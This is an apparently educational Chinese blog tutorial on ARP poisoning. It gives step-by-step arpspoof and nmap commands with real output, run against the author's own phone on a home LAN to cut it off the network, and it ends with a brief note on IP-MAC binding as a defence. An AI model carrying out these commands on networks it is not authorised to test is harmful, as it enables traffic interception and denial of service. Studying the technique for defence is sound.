ARP攻击与欺骗实战

ARP攻击与欺骗实战

ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。

文章目录


ARP攻击原理

通过伪造IP地址和MAC地址的对应关系,使得网络无法正常通信。

ARP欺骗原理

欺骗源把自己伪装成网关(或另一台主机),向局域网内的目标主机发送ARP应答报文,使得局域网内的主机误以为欺骗源的MAC地址是网关(或另一台主机)的MAC地址,并将原本流向网关(或另一台主机)的数据都发送到欺骗源。


实施ARP欺骗

1.安装Arpspoof工具

sudo apt-get install dsniff

使用语法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

参数
-i interface 指定要使用的接口。
-c own|host|both 指定范围own|host|both(自己|主机|两者)
-t target 指定一台特定主机进行ARP中毒(如果未指定,则为LAN上的所有主机)
-r 毒害两个主机(主机和目标)以捕获两个方向的流量。(仅对-t有效)
host 指定您希望拦截数据包的host(通常是本地网关)

示例
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

192.168.1.100为攻击目标的IP,192.168.1.1为攻击目标的网关

2.开启路由转发

echo 1 > /proc/sys/net/ipv4/ip_forward

3.查看攻击机IP地址和ARP缓存表

查看IP地址:

root@kali:/home/sknife# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.105  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::20c:29ff:fe3f:1aea  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:3f:1a:ea  txqueuelen 1000  (Ethernet)
        RX packets 161798  bytes 139527686 (133.0 MiB)
        RX errors 0  dropped 10  overruns 0  frame 0
        TX packets 66839  bytes 16672614 (15.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 229  bytes 12275 (11.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 229  bytes 12275 (11.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

注:攻击机网络连接为桥接模式(必须和被攻击机在同一局域网下)。

查看ARP缓存表:

root@kali:/home/sknife# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.101            ether   e4:a7:c5:43:ab:b1   C                     eth0
192.168.0.103            ether   e4:34:93:d3:7c:26   C                     eth0
192.168.0.104            ether   30:24:32:e7:df:a6   C                     eth0
192.168.0.100            ether   dc:72:9b:de:36:ad   C                     eth0
192.168.0.102            ether   68:27:37:40:70:ce   C                     eth0
192.168.0.1              ether   f4:83:cd:00:99:a7   C                     eth0

注:192.168.0.1为网关,其他均为主机。

4.定位被攻击机

nmap扫描主机192.168.0.100

root@kali:/home/sknife# nmap -O 192.168.0.100
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-30 17:54 CST
Nmap scan report for 192.168.0.100
Host is up (0.026s latency).
Not shown: 999 closed ports
PORT      STATE    SERVICE
16080/tcp filtered osxwebadmin
MAC Address: DC:72:9B:DE:36:AD (Huawei Technologies)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.04 seconds

可以看出这是作者的华为(Huawei)手机

ARP攻击与欺骗实战
注:直接看手机的状态消息也可以知道IP地址。

5.开始攻击

在攻击机上执行命令:

oot@kali:/home/sknife# arpspoof -i eth0 -t 192.168.0.100 192.168.0.1
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea

从输出信息可以看到,攻击机在向目标主机发送ARP应答包,告诉目标主机网关的MAC地址为00:0c:29:3f:1a:ea(攻击主机的MAC地址)。此时ARP欺骗已经成功,手机无法联网。


ARP欺骗防御

在路由器中绑定IP-MAC
ARP攻击与欺骗实战


声明

本文仅供网络安全爱好者学习探讨,请勿用于违法犯罪。

上一篇:网络基础知识


下一篇:我爬取了知乎上大学相关话题中的热门高赞问答,其中是否有你大学生活的影子呢?